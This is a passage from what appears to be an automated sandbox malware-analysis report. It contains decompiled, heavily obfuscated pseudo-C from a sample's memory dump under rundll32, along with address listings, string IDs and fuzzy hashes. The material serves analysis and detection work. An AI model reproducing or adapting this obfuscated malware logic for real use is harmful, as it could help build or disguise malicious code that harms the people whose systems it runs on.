                                                                                                                      						E0081DBCE(E00819F66(_v1072, _v1080, _t373), _t373, _v1056,  *0x1002520c + 8,  *0x1002520c + 0x220, _v1064, _v1060, _v1112, _v1084,  *0x1002520c + 0x220);
                                                                                                                      						_t307 = E0081A203(_v1148, _v1140, _v1076, _t314);
                                                                                                                      						_t365 =  &(_t365[0xd]);
                                                                                                                      						_t361 = 0xac73e1e;
                                                                                                                      					}
                                                                                                                      					_t361 = 0xc947a3e;
                                                                                                                      					L8:
                                                                                                                      					__eflags = _t361 - 0x9b97ca4;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t307;
                                                                                                                      			}

















































                                                                                                                      0x00811ed5
                                                                                                                      0x00811ee2
                                                                                                                      0x00811ee6
                                                                                                                      0x00811eee
                                                                                                                      0x00811ef6
                                                                                                                      0x00811efe
                                                                                                                      0x00811f06
                                                                                                                      0x00811f10
                                                                                                                      0x00811f19
                                                                                                                      0x00811f1d
                                                                                                                      0x00811f25
                                                                                                                      0x00811f2d
                                                                                                                      0x00811f3a
                                                                                                                      0x00811f3e
                                                                                                                      0x00811f46
                                                                                                                      0x00811f4e
                                                                                                                      0x00811f56
                                                                                                                      0x00811f5b
                                                                                                                      0x00811f63
                                                                                                                      0x00811f6b
                                                                                                                      0x00811f73
                                                                                                                      0x00811f7b
                                                                                                                      0x00811f83
                                                                                                                      0x00811f8b
                                                                                                                      0x00811f93
                                                                                                                      0x00811f98
                                                                                                                      0x00811fa0
                                                                                                                      0x00811fa8
                                                                                                                      0x00811fb0
                                                                                                                      0x00811fb5
                                                                                                                      0x00811fbd
                                                                                                                      0x00811fc5
                                                                                                                      0x00811fcd
                                                                                                                      0x00811fd5
                                                                                                                      0x00811fda
                                                                                                                      0x00811fdf
                                                                                                                      0x00811fe7
                                                                                                                      0x00811ff4
                                                                                                                      0x00811ff8
                                                                                                                      0x00811ffd
                                                                                                                      0x00812007
                                                                                                                      0x0081200f
                                                                                                                      0x0081201a
                                                                                                                      0x0081201d
                                                                                                                      0x00812021
                                                                                                                      0x00812031
                                                                                                                      0x00812045
                                                                                                                      0x00812045
                                                                                                                      0x00812053
                                                                                                                      0x00812177
                                                                                                                      0x0081217f
                                                                                                                      0x00812180
                                                                                                                      0x00000000
                                                                                                                      0x00812191
                                                                                                                      0x0081205b
                                                                                                                      0x008120ea
                                                                                                                      0x008120ee
                                                                                                                      0x008120fa
                                                                                                                      0x008120ff
                                                                                                                      0x0081210d
                                                                                                                      0x00812116
                                                                                                                      0x0081211c
                                                                                                                      0x0081212b
                                                                                                                      0x0081213f
                                                                                                                      0x00812151
                                                                                                                      0x00812156
                                                                                                                      0x00812159
                                                                                                                      0x00000000
                                                                                                                      0x00812159
                                                                                                                      0x00812061
                                                                                                                      0x00812063
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00812069
                                                                                                                      0x0081206d
                                                                                                                      0x00812079
                                                                                                                      0x008120c6
                                                                                                                      0x008120db
                                                                                                                      0x008120e0
                                                                                                                      0x008120e3
                                                                                                                      0x008120e3
                                                                                                                      0x00812160
                                                                                                                      0x00812162
                                                                                                                      0x00812162
                                                                                                                      0x00812162
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D'j$KE.$U)$j$l}$wt
                                                                                                                      • API String ID: 0-3929749274
                                                                                                                      • Opcode ID: baca91a794a0e7c3fd6e6c2fdcf88c70c4b6f9b5167e9fca30c832c3318b6c7c
                                                                                                                      • Instruction ID: 363575cbef58308c80ea4a47e8674bf361aac1567c69a414cf3e46df1b2f69c8
                                                                                                                      • Opcode Fuzzy Hash: baca91a794a0e7c3fd6e6c2fdcf88c70c4b6f9b5167e9fca30c832c3318b6c7c
                                                                                                                      • Instruction Fuzzy Hash: 66D12FB24083809FC368CF25C58A94BFBE1FBC5748F508A1DF2E696260D7B58949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0082069C(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				void* _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				char _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				unsigned int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				void* _t225;
                                                                                                                      				signed int _t257;
                                                                                                                      				signed int* _t258;
                                                                                                                      				void* _t260;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t297;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int _t299;
                                                                                                                      				signed int _t300;
                                                                                                                      				signed int* _t305;
                                                                                                                      				void* _t308;
                                                                                                                      
                                                                                                                      				_t302 = _a8;
                                                                                                                      				_t258 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0081C325(_t225);
                                                                                                                      				_v20 = 0x578391;
                                                                                                                      				_t305 =  &(( &_v164)[4]);
                                                                                                                      				asm("stosd");
                                                                                                                      				_t260 = 0x3e847b6;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v136 = 0x7901e7;
                                                                                                                      				_v136 = _v136 ^ 0x0e05b978;
                                                                                                                      				_v136 = _v136 | 0x8500df2f;
                                                                                                                      				_v136 = _v136 ^ 0x8f7cffbf;
                                                                                                                      				_v72 = 0x5c6105;
                                                                                                                      				_v72 = _v72 ^ 0xba418fb0;
                                                                                                                      				_v72 = _v72 ^ 0xba16afcf;
                                                                                                                      				_v156 = 0xc57f64;
                                                                                                                      				_v156 = _v156 << 0xe;
                                                                                                                      				_v156 = _v156 | 0xac310e4c;
                                                                                                                      				_t295 = 0x48;
                                                                                                                      				_v156 = _v156 / _t295;
                                                                                                                      				_v156 = _v156 ^ 0x038a2108;
                                                                                                                      				_v100 = 0xf9dfe5;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_v100 = _v100 ^ 0x0009d912;
                                                                                                                      				_v112 = 0xb5688b;
                                                                                                                      				_t296 = 0x3d;
                                                                                                                      				_v112 = _v112 / _t296;
                                                                                                                      				_v112 = _v112 ^ 0x00064c77;
                                                                                                                      				_v116 = 0x80f1cc;
                                                                                                                      				_v116 = _v116 + 0xfffff23f;
                                                                                                                      				_v116 = _v116 ^ 0x008ab174;
                                                                                                                      				_v92 = 0xc78857;
                                                                                                                      				_v92 = _v92 | 0x5f9c477c;
                                                                                                                      				_v92 = _v92 ^ 0x5fdf5dba;
                                                                                                                      				_v148 = 0x3d8773;
                                                                                                                      				_v148 = _v148 >> 0xa;
                                                                                                                      				_v148 = _v148 | 0x15c33ced;
                                                                                                                      				_v148 = _v148 + 0xffff6977;
                                                                                                                      				_v148 = _v148 ^ 0x15c9e03a;
                                                                                                                      				_v140 = 0x8050fd;
                                                                                                                      				_v140 = _v140 + 0xffffb165;
                                                                                                                      				_v140 = _v140 ^ 0xb13fe806;
                                                                                                                      				_v140 = _v140 ^ 0xb1b5a353;
                                                                                                                      				_v104 = 0x3fa35;
                                                                                                                      				_v104 = _v104 ^ 0x0635ab8b;
                                                                                                                      				_v104 = _v104 ^ 0x0638ddfb;
                                                                                                                      				_v128 = 0x6276d2;
                                                                                                                      				_v128 = _v128 * 0x67;
                                                                                                                      				_v128 = _v128 >> 7;
                                                                                                                      				_v128 = _v128 ^ 0x004624e6;
                                                                                                                      				_v84 = 0xb2127e;
                                                                                                                      				_v84 = _v84 ^ 0xdd4df2db;
                                                                                                                      				_v84 = _v84 ^ 0xddf0f9d7;
                                                                                                                      				_v108 = 0x825106;
                                                                                                                      				_v108 = _v108 + 0x54ee;
                                                                                                                      				_v108 = _v108 ^ 0x00831379;
                                                                                                                      				_v96 = 0x675ffa;
                                                                                                                      				_v96 = _v96 + 0xffff86b7;
                                                                                                                      				_v96 = _v96 ^ 0x0064c66c;
                                                                                                                      				_v132 = 0x78c111;
                                                                                                                      				_v132 = _v132 >> 0xb;
                                                                                                                      				_v132 = _v132 + 0xffff7c58;
                                                                                                                      				_v132 = _v132 ^ 0xfff3b3ba;
                                                                                                                      				_v164 = 0xbe0848;
                                                                                                                      				_t297 = 0x46;
                                                                                                                      				_v164 = _v164 / _t297;
                                                                                                                      				_v164 = _v164 << 4;
                                                                                                                      				_v164 = _v164 >> 5;
                                                                                                                      				_v164 = _v164 ^ 0x00009249;
                                                                                                                      				_v152 = 0xd46630;
                                                                                                                      				_v152 = _v152 | 0x25786146;
                                                                                                                      				_v152 = _v152 << 6;
                                                                                                                      				_t298 = 0x4f;
                                                                                                                      				_v152 = _v152 / _t298;
                                                                                                                      				_v152 = _v152 ^ 0x0191f926;
                                                                                                                      				_v144 = 0xf6674c;
                                                                                                                      				_v144 = _v144 >> 6;
                                                                                                                      				_v144 = _v144 ^ 0xb535724d;
                                                                                                                      				_v144 = _v144 ^ 0xb53e6a0f;
                                                                                                                      				_v160 = 0x2a1e3b;
                                                                                                                      				_v160 = _v160 >> 5;
                                                                                                                      				_t299 = 0x76;
                                                                                                                      				_v160 = _v160 / _t299;
                                                                                                                      				_v160 = _v160 << 7;
                                                                                                                      				_v160 = _v160 ^ 0x00046312;
                                                                                                                      				_v120 = 0xf44552;
                                                                                                                      				_v120 = _v120 + 0xbd95;
                                                                                                                      				_v120 = _v120 ^ 0x00f02cb9;
                                                                                                                      				_v76 = 0x9a2b11;
                                                                                                                      				_v76 = _v76 << 6;
                                                                                                                      				_v76 = _v76 ^ 0x2684a730;
                                                                                                                      				_v80 = 0x6aeef9;
                                                                                                                      				_t300 = 0x51;
                                                                                                                      				_v80 = _v80 / _t300;
                                                                                                                      				_v80 = _v80 ^ 0x000c464e;
                                                                                                                      				_v124 = 0x84a5f5;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 + 0xddfe;
                                                                                                                      				_v124 = _v124 ^ 0x10975fd7;
                                                                                                                      				_v88 = 0xa441a9;
                                                                                                                      				_v88 = _v88 + 0x5567;
                                                                                                                      				_v88 = _v88 ^ 0x00aef9b7;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t308 = _t260 - 0x8801db7;
                                                                                                                      						if(_t308 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t308 == 0) {
                                                                                                                      							E0082EC8F(_t302 + 0x1c,  &_v68, __eflags, _v80, _v124, _v88);
                                                                                                                      						} else {
                                                                                                                      							if(_t260 == 0x235eed) {
                                                                                                                      								E00824191( *((intOrPtr*)(_t302 + 0x18)),  &_v68, _v164, _v152);
                                                                                                                      								_t305 =  &(_t305[2]);
                                                                                                                      								_t260 = 0x85d9450;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t260 == 0x3e847b6) {
                                                                                                                      									_t260 = 0xab5e479;
                                                                                                                      									 *_t258 =  *_t258 & 0x00000000;
                                                                                                                      									_t258[1] = _v136;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t260 == 0x6ea21eb) {
                                                                                                                      										E00824191( *((intOrPtr*)(_t302 + 0x24)),  &_v68, _v84, _v108);
                                                                                                                      										_t305 =  &(_t305[2]);
                                                                                                                      										_t260 = 0x9265c01;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t260 == 0x80db57c) {
                                                                                                                      											E00824191( *((intOrPtr*)(_t302 + 0x30)),  &_v68, _v120, _v76);
                                                                                                                      											_t305 =  &(_t305[2]);
                                                                                                                      											_t260 = 0x8801db7;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t260 != 0x85d9450) {
                                                                                                                      												goto L24;
                                                                                                                      											} else {
                                                                                                                      												E00824191( *((intOrPtr*)(_t302 + 0x38)),  &_v68, _v144, _v160);
                                                                                                                      												_t305 =  &(_t305[2]);
                                                                                                                      												_t260 = 0x80db57c;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L27:
                                                                                                                      						__eflags =  *_t258;
                                                                                                                      						_t224 =  *_t258 != 0;
                                                                                                                      						__eflags = _t224;
                                                                                                                      						return 0 | _t224;
                                                                                                                      					}
                                                                                                                      					__eflags = _t260 - 0x9265c01;
                                                                                                                      					if(_t260 == 0x9265c01) {
                                                                                                                      						E00824191( *((intOrPtr*)(_t302 + 0x34)),  &_v68, _v96, _v132);
                                                                                                                      						_t305 =  &(_t305[2]);
                                                                                                                      						_t260 = 0x235eed;
                                                                                                                      						goto L24;
                                                                                                                      					} else {
                                                                                                                      						__eflags = _t260 - 0xa20e3fb;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E0082EC8F(_t302 + 8,  &_v68, __eflags, _v140, _v104, _v128);
                                                                                                                      							_t305 =  &(_t305[3]);
                                                                                                                      							_t260 = 0x6ea21eb;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t260 - 0xab5e479;
                                                                                                                      							if(_t260 == 0xab5e479) {
                                                                                                                      								_t258[1] = E0083086E(_t302);
                                                                                                                      								_t260 = 0xffaf556;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t260 - 0xf4853c6;
                                                                                                                      								if(_t260 == 0xf4853c6) {
                                                                                                                      									E008258C5(_v112, _v116, _v92, _v148, _t258,  &_v68);
                                                                                                                      									_t305 =  &(_t305[4]);
                                                                                                                      									_t260 = 0xa20e3fb;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t260 - 0xffaf556;
                                                                                                                      									if(_t260 != 0xffaf556) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										_push(_t260);
                                                                                                                      										_push(_t260);
                                                                                                                      										_t257 = E00822912(_t258[1]);
                                                                                                                      										 *_t258 = _t257;
                                                                                                                      										__eflags = _t257;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t260 = 0xf4853c6;
                                                                                                                      											goto L1;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L27;
                                                                                                                      					L24:
                                                                                                                      					__eflags = _t260 - 0x1d5478a;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L27;
                                                                                                                      			}

                                                                                                                      0x008209ab
                                                                                                                      0x008209ab
                                                                                                                      0x008209ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x008209b3
                                                                                                                      0x00820b6b
                                                                                                                      0x008209b9
                                                                                                                      0x008209bf
                                                                                                                      0x00820a66
                                                                                                                      0x00820a6b
                                                                                                                      0x00820a6e
                                                                                                                      0x00000000
                                                                                                                      0x008209c5
                                                                                                                      0x008209cb
                                                                                                                      0x00820a47
                                                                                                                      0x00820a4c
                                                                                                                      0x00820a4f
                                                                                                                      0x00000000
                                                                                                                      0x008209cd
                                                                                                                      0x008209d3
                                                                                                                      0x00820a31
                                                                                                                      0x00820a36
                                                                                                                      0x00820a39
                                                                                                                      0x00000000
                                                                                                                      0x008209d5
                                                                                                                      0x008209db
                                                                                                                      0x00820a16
                                                                                                                      0x00820a1b
                                                                                                                      0x00820a1e
                                                                                                                      0x00000000
                                                                                                                      0x008209dd
                                                                                                                      0x008209e3
                                                                                                                      0x00000000
                                                                                                                      0x008209e9
                                                                                                                      0x008209f8
                                                                                                                      0x008209fd
                                                                                                                      0x00820a00
                                                                                                                      0x00000000
                                                                                                                      0x00820a00
                                                                                                                      0x008209e3
                                                                                                                      0x008209db
                                                                                                                      0x008209d3
                                                                                                                      0x008209cb
                                                                                                                      0x008209bf
                                                                                                                      0x00820b74
                                                                                                                      0x00820b76
                                                                                                                      0x00820b7a
                                                                                                                      0x00820b7a
                                                                                                                      0x00820b84
                                                                                                                      0x00820b84
                                                                                                                      0x00820a78
                                                                                                                      0x00820a7e
                                                                                                                      0x00820b3d
                                                                                                                      0x00820b42
                                                                                                                      0x00820b45
                                                                                                                      0x00000000
                                                                                                                      0x00820a84
                                                                                                                      0x00820a84
                                                                                                                      0x00820a8a
                                                                                                                      0x00820b1c
                                                                                                                      0x00820b21
                                                                                                                      0x00820b24
                                                                                                                      0x00000000
                                                                                                                      0x00820a8c
                                                                                                                      0x00820a8c
                                                                                                                      0x00820a92
                                                                                                                      0x00820afc
                                                                                                                      0x00820aff
                                                                                                                      0x00000000
                                                                                                                      0x00820a94
                                                                                                                      0x00820a94
                                                                                                                      0x00820a96
                                                                                                                      0x00820ae3
                                                                                                                      0x00820ae8
                                                                                                                      0x00820aeb
                                                                                                                      0x00000000
                                                                                                                      0x00820a98
                                                                                                                      0x00820a98
                                                                                                                      0x00820a9e
                                                                                                                      0x00000000
                                                                                                                      0x00820aa4
                                                                                                                      0x00820ab0
                                                                                                                      0x00820ab1
                                                                                                                      0x00820ab5
                                                                                                                      0x00820aba
                                                                                                                      0x00820abe
                                                                                                                      0x00820ac0
                                                                                                                      0x00820ac6
                                                                                                                      0x00000000
                                                                                                                      0x00820ac6
                                                                                                                      0x00820ac0
                                                                                                                      0x00820a9e
                                                                                                                      0x00820a96
                                                                                                                      0x00820a92
                                                                                                                      0x00820a8a
                                                                                                                      0x00000000
                                                                                                                      0x00820b4a
                                                                                                                      0x00820b4a
                                                                                                                      0x00820b4a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fax%$gU$$F$T$^#$^#
                                                                                                                      • API String ID: 0-2311862416
                                                                                                                      • Opcode ID: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction ID: e0fd17852f250047d3e4bce44f72abe4f06303559dee3c5ab17819124a4da036
                                                                                                                      • Opcode Fuzzy Hash: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction Fuzzy Hash: B7C162715087809FC768CF65D88981FBBE2FBD4718F504A1CF6868A262D3B58988CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 74%
                                                                                                                      			E00822A3D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				char _v68;
                                                                                                                      				char _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				char _t264;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int _t299;
                                                                                                                      				signed int _t300;
                                                                                                                      				signed int _t301;
                                                                                                                      				signed int _t302;
                                                                                                                      				signed int _t303;
                                                                                                                      				signed int _t304;
                                                                                                                      				void* _t307;
                                                                                                                      				void* _t308;
                                                                                                                      				void* _t334;
                                                                                                                      				intOrPtr _t335;
                                                                                                                      				signed int* _t338;
                                                                                                                      
                                                                                                                      				_push(_a28);
                                                                                                                      				_t334 = __ecx;
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(0);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t264 = E0081C325(0);
                                                                                                                      				_v72 = _t264;
                                                                                                                      				_t335 = _t264;
                                                                                                                      				_v124 = 0xc44be;
                                                                                                                      				_t338 =  &(( &_v176)[9]);
                                                                                                                      				_v124 = _v124 + 0xffff24c4;
                                                                                                                      				_t307 = 0xc36eaf9;
                                                                                                                      				_t298 = 0x37;
                                                                                                                      				_v124 = _v124 * 0x2e;
                                                                                                                      				_v124 = _v124 ^ 0x020cf15c;
                                                                                                                      				_v176 = 0xedca77;
                                                                                                                      				_v176 = _v176 * 0x1f;
                                                                                                                      				_v176 = _v176 << 4;
                                                                                                                      				_v176 = _v176 + 0xdbf9;
                                                                                                                      				_v176 = _v176 ^ 0xccb922a9;
                                                                                                                      				_v120 = 0x5a606;
                                                                                                                      				_v120 = _v120 | 0xc9e49228;
                                                                                                                      				_t299 = 0x62;
                                                                                                                      				_v120 = _v120 / _t298;
                                                                                                                      				_v120 = _v120 ^ 0x03ad0d8c;
                                                                                                                      				_v144 = 0x918442;
                                                                                                                      				_v144 = _v144 >> 0xd;
                                                                                                                      				_v144 = _v144 * 0x3e;
                                                                                                                      				_v144 = _v144 + 0xa3d5;
                                                                                                                      				_v144 = _v144 ^ 0x0007140c;
                                                                                                                      				_v88 = 0x37923f;
                                                                                                                      				_v88 = _v88 ^ 0x32449291;
                                                                                                                      				_v88 = _v88 ^ 0x3276c44e;
                                                                                                                      				_v168 = 0xa5175f;
                                                                                                                      				_v168 = _v168 + 0x6cd0;
                                                                                                                      				_v168 = _v168 >> 0xd;
                                                                                                                      				_v168 = _v168 + 0x50d;
                                                                                                                      				_v168 = _v168 ^ 0x000b28ed;
                                                                                                                      				_v96 = 0x8bb9e8;
                                                                                                                      				_v96 = _v96 ^ 0x9313002a;
                                                                                                                      				_v96 = _v96 ^ 0x93929827;
                                                                                                                      				_v128 = 0x9b97bd;
                                                                                                                      				_v128 = _v128 >> 9;
                                                                                                                      				_v128 = _v128 + 0x506c;
                                                                                                                      				_v128 = _v128 ^ 0x0008f405;
                                                                                                                      				_v136 = 0x162b;
                                                                                                                      				_v136 = _v136 << 0xe;
                                                                                                                      				_v136 = _v136 ^ 0xcbe41246;
                                                                                                                      				_v136 = _v136 ^ 0xce6e1682;
                                                                                                                      				_v160 = 0xb72d70;
                                                                                                                      				_v160 = _v160 >> 8;
                                                                                                                      				_v160 = _v160 ^ 0x815bd7a2;
                                                                                                                      				_v160 = _v160 ^ 0x177336f3;
                                                                                                                      				_v160 = _v160 ^ 0x962c98d3;
                                                                                                                      				_v100 = 0xe545e5;
                                                                                                                      				_v100 = _v100 + 0xffffaae8;
                                                                                                                      				_v100 = _v100 | 0x514a639c;
                                                                                                                      				_v100 = _v100 ^ 0x51eea269;
                                                                                                                      				_v152 = 0xd9d32c;
                                                                                                                      				_v152 = _v152 >> 8;
                                                                                                                      				_v152 = _v152 ^ 0x78b07b8d;
                                                                                                                      				_v152 = _v152 / _t299;
                                                                                                                      				_v152 = _v152 ^ 0x01343475;
                                                                                                                      				_v92 = 0x6219a9;
                                                                                                                      				_v92 = _v92 << 8;
                                                                                                                      				_v92 = _v92 ^ 0x6210c938;
                                                                                                                      				_v80 = 0x3ff2a1;
                                                                                                                      				_v80 = _v80 + 0xffff7ea3;
                                                                                                                      				_v80 = _v80 ^ 0x003f2f73;
                                                                                                                      				_v164 = 0xe5565b;
                                                                                                                      				_v164 = _v164 + 0xffff5b62;
                                                                                                                      				_t300 = 0x78;
                                                                                                                      				_v164 = _v164 * 6;
                                                                                                                      				_v164 = _v164 / _t300;
                                                                                                                      				_v164 = _v164 ^ 0x000727eb;
                                                                                                                      				_v76 = 0x250d2;
                                                                                                                      				_v76 = _v76 | 0x8f851c12;
                                                                                                                      				_v76 = _v76 ^ 0x8f8220e2;
                                                                                                                      				_v116 = 0x568e;
                                                                                                                      				_v116 = _v116 ^ 0x3d61f204;
                                                                                                                      				_v116 = _v116 << 7;
                                                                                                                      				_v116 = _v116 ^ 0xb0d54eba;
                                                                                                                      				_v172 = 0xa5a4a3;
                                                                                                                      				_v172 = _v172 | 0xd2f7b266;
                                                                                                                      				_v172 = _v172 >> 0xd;
                                                                                                                      				_t301 = 0x7f;
                                                                                                                      				_v172 = _v172 * 0x30;
                                                                                                                      				_v172 = _v172 ^ 0x0132b547;
                                                                                                                      				_v112 = 0xd0329d;
                                                                                                                      				_v112 = _v112 * 0x58;
                                                                                                                      				_v112 = _v112 << 3;
                                                                                                                      				_v112 = _v112 ^ 0x3c81866c;
                                                                                                                      				_v104 = 0x844e69;
                                                                                                                      				_v104 = _v104 << 0xc;
                                                                                                                      				_v104 = _v104 >> 4;
                                                                                                                      				_v104 = _v104 ^ 0x0443b556;
                                                                                                                      				_v84 = 0x1d6374;
                                                                                                                      				_v84 = _v84 >> 0xd;
                                                                                                                      				_v84 = _v84 ^ 0x000df0de;
                                                                                                                      				_v148 = 0x6585fd;
                                                                                                                      				_v148 = _v148 / _t301;
                                                                                                                      				_t302 = 0x77;
                                                                                                                      				_v148 = _v148 / _t302;
                                                                                                                      				_v148 = _v148 >> 0xa;
                                                                                                                      				_v148 = _v148 ^ 0x000a9d1a;
                                                                                                                      				_v156 = 0xff5a31;
                                                                                                                      				_v156 = _v156 + 0xce45;
                                                                                                                      				_t303 = 0x29;
                                                                                                                      				_v156 = _v156 / _t303;
                                                                                                                      				_v156 = _v156 << 1;
                                                                                                                      				_v156 = _v156 ^ 0x0008392b;
                                                                                                                      				_v132 = 0x13d5b5;
                                                                                                                      				_v132 = _v132 << 0x10;
                                                                                                                      				_v132 = _v132 + 0xffff95f7;
                                                                                                                      				_v132 = _v132 ^ 0xd5b1b27f;
                                                                                                                      				_v108 = 0x3556bb;
                                                                                                                      				_v108 = _v108 * 0x4f;
                                                                                                                      				_v108 = _v108 + 0xffff90f3;
                                                                                                                      				_v108 = _v108 ^ 0x10791788;
                                                                                                                      				_v140 = 0x81de0d;
                                                                                                                      				_t304 = 0x6d;
                                                                                                                      				_v140 = _v140 / _t304;
                                                                                                                      				_v140 = _v140 + 0xf4b;
                                                                                                                      				_v140 = _v140 * 0x26;
                                                                                                                      				_v140 = _v140 ^ 0x002a9917;
                                                                                                                      				do {
                                                                                                                      					while(_t307 != 0x688d2d5) {
                                                                                                                      						if(_t307 == 0x8a4f536) {
                                                                                                                      							_t295 = E00824F0E(_a28, _v120,  &_v72, _v144);
                                                                                                                      							_t338 =  &(_t338[3]);
                                                                                                                      							__eflags = _t295;
                                                                                                                      							if(_t295 != 0) {
                                                                                                                      								_t307 = 0x688d2d5;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t307 == 0x94a3104) {
                                                                                                                      								E00816234(_v132, _v72, _v108, _v140);
                                                                                                                      							} else {
                                                                                                                      								if(_t307 != 0xc36eaf9) {
                                                                                                                      									goto L9;
                                                                                                                      								} else {
                                                                                                                      									_t307 = 0x8a4f536;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L12:
                                                                                                                      						return _t335;
                                                                                                                      					}
                                                                                                                      					_push(_v128);
                                                                                                                      					_push(_v96);
                                                                                                                      					_push(_v168);
                                                                                                                      					_push(_v88);
                                                                                                                      					_t308 = 0x44;
                                                                                                                      					E00830710(_t308,  &_v68);
                                                                                                                      					_push(_v152);
                                                                                                                      					_v68 = 0x44;
                                                                                                                      					_push(_v100);
                                                                                                                      					_t309 = _v136;
                                                                                                                      					_push(0x10001800);
                                                                                                                      					_v60 = E00819F66(_v136, _v160, __eflags);
                                                                                                                      					__eflags = _v176 | _v124;
                                                                                                                      					_t335 = E0082BCBD(_v92, _v136, _v80, _v136, _t309, _v164, _v76, _a20, _v116, _t334, _a28, _v172, _v176 | _v124, 0, _v112,  &_v68, _v72, _v104);
                                                                                                                      					E0081A203(_v84, _v148, _v156, _v60);
                                                                                                                      					_t338 =  &(_t338[0x1a]);
                                                                                                                      					_t307 = 0x94a3104;
